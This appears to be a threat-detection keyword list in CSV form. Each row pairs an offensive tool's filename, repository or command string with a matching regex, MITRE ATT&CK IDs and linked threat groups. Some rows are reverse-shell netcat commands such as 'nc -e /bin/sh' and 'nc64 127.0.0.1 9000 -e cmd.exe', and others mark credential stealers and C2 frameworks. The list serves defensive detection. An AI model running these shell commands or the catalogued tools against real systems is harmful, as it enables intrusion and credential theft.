"*nc -c /bin/sh *",".{0,1000}nc\s\-c\s\/bin\/sh\s.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","52697"
"*nc -e /bin/sh * *",".{0,1000}nc\s\-e\s\/bin\/sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","52698"
"*nc -nlvp 4444*",".{0,1000}nc\s\-nlvp\s4444.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","52703"
"*nc -vlp 4444*",".{0,1000}nc\s\-vlp\s4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","52706"
"*nc -vlp 4445*",".{0,1000}nc\s\-vlp\s4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","52707"
"*nc.exe 127.0.0.1 4444*",".{0,1000}nc\.exe\s127\.0\.0\.1\s4444.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","52710"
"*nc.exe -l -p 1337*",".{0,1000}nc\.exe\s\-l\s\-p\s1337.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","52712"
"*nc64 127.0.0.1 9000 -e cmd.exe*",".{0,1000}nc64\s127\.0\.0\.1\s9000\s\-e\scmd\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","52713"
"*nc64 -L -vv -p 9000*",".{0,1000}nc64\s\-L\s\-vv\s\-p\s9000.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","52714"
"*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","52715"
"*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52716"
"*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52717"
"*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","52718"
"*nccgroup/ABPTTS*",".{0,1000}nccgroup\/ABPTTS.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","52722"
"*nccgroup/Accomplice*",".{0,1000}nccgroup\/Accomplice.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","52723"
"*nccgroup/demiguise*",".{0,1000}nccgroup\/demiguise.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","52724"
"*nccgroup/SCOMDecrypt*",".{0,1000}nccgroup\/SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","52725"
"*ncrack-*.dmg*",".{0,1000}ncrack\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","#macos","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52726"
"*ncrack-*-setup.exe*",".{0,1000}ncrack\-.{0,1000}\-setup\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52727"
"*ncrack.exe*",".{0,1000}ncrack\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52728"
"*NcrackInstaller.exe*",".{0,1000}NcrackInstaller\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52729"
"*ncrack-master.zip*",".{0,1000}ncrack\-master\.zip.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52730"
"*ncrack-services*",".{0,1000}ncrack\-services.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52731"
"*ndDelegation.py*",".{0,1000}ndDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52732"
"*ndp_spoof.*",".{0,1000}ndp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","52733"
"*Ne0nd0g/merlin*",".{0,1000}Ne0nd0g\/merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","52734"
"*Ne0nd0g/merlin-agent*",".{0,1000}Ne0nd0g\/merlin\-agent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","52735"
"*Ne0nd0g/merlin-agent-dll*",".{0,1000}Ne0nd0g\/merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","52736"
"*NecroStealer.exe*",".{0,1000}NecroStealer\.exe.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","1","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","52737"
"*needle_sift.x64*",".{0,1000}needle_sift\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","52738"
"*Needles without the Thread.pptx*",".{0,1000}Needles\swithout\sthe\sThread\.pptx.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","52739"
"*needlesift.cna*",".{0,1000}needlesift\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","52740"
"*Nemesis frontend HTTP server endpoint*",".{0,1000}Nemesis\sfrontend\sHTTP\sserver\sendpoint.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52741"
"*nemesis:Qwerty12345@*",".{0,1000}nemesis\:Qwerty12345\@.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52742"
"*nemesis@nemesis.com*",".{0,1000}nemesis\@nemesis\.com.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#email","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52743"
"*nemesis@nemesis.local*",".{0,1000}nemesis\@nemesis\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52744"
"*NEMESIS_API_URL*",".{0,1000}NEMESIS_API_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52745"
"*NEMESIS_HTTP_SERVER *",".{0,1000}NEMESIS_HTTP_SERVER\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52746"
"*nemesis_post_file(*",".{0,1000}nemesis_post_file\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52747"
"*nemesis-rabbitmq-discovery*",".{0,1000}nemesis\-rabbitmq\-discovery.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52748"
"*nemesis-rabbitmq-discovery.default.svc.cluster.local*",".{0,1000}nemesis\-rabbitmq\-discovery\.default\.svc\.cluster\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52749"
"*NemesisRabbitMQProducer*",".{0,1000}NemesisRabbitMQProducer.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52750"
"*neo2john.py*",".{0,1000}neo2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52751"
"*neo4jconnection.py*",".{0,1000}neo4jconnection\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","52754"
"*nessus* --set listen_address=127.0.0.1*",".{0,1000}nessus.{0,1000}\s\-\-set\slisten_address\=127\.0\.0\.1.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52758"
"*Nessus-*.deb*",".{0,1000}Nessus\-.{0,1000}\.deb.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52759"
"*Nessus-*.dmg*",".{0,1000}Nessus\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","#macos","N/A","9","10","N/A","N/A","N/A","N/A","52760"
"*Nessus-*.msi*",".{0,1000}Nessus\-.{0,1000}\.msi.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52761"
"*Nessus-*.rpm*",".{0,1000}Nessus\-.{0,1000}\.rpm.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52762"
"*Nessus-*.tar.gz*",".{0,1000}Nessus\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52763"
"*Nessus-*.txz*",".{0,1000}Nessus\-.{0,1000}\.txz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52764"
"*nessus_vulns_cleaner.rc*",".{0,1000}nessus_vulns_cleaner\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52765"
"*nessuscli fetch*",".{0,1000}nessuscli\sfetch.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","52766"
"*nessuscli fix*",".{0,1000}nessuscli\sfix.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","0","#linux","N/A","9","10","N/A","N/A","N/A","N/A","52767"
"*nessus-updates*.tar.gz*",".{0,1000}nessus\-updates.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","52768"
"*net domain_controllers*",".{0,1000}net\sdomain_controllers.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52778"
